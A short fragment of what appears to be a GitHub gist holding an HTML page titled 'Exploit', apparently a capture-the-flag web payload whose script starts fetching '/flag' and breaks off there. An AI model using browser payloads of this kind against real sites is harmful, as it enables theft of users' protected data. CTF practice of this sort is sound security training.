Skip to content

Instantly share code, notes, and snippets.

<!DOCTYPE html>
<html>
<head>
<title>Exploit</title>
</head>
<body>
<script>
// Пытаемся прочитать всё
Promise.all([
fetch('/flag').then(r => r.text()),